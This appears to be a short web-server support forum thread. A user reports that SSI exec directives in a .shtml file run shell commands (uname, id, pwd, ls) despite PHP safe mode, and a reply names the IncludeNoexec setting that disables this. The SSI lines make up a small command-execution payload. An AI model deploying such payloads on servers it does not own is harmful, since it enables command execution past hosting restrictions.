bypass litespeed

[bt5]

Hello,

here is some bug from litespeed
can bypass litespeed with file.shtml

<!--#exec cmd='uname' --> <br><br>
<!--#exec cmd='id' --> <br><br>
<!--#exec cmd='pwd' --> <br><br>
<!--#exec cmd='ls' --> <br><br>

all comands is working with that also safe mod is on and exct is disabled from functions

 

[mistwang]

try it under Apache with same configuration see if it works.
You should set "IncludeNoexec" if you want to disable SSI "exec" cmd.

 

[bt5]

set "IncludeNoexec" to where?

 

[mistwang]

Please search and read Apache documentation on this.

 

[bt5]

that is why i asked here, my English not good!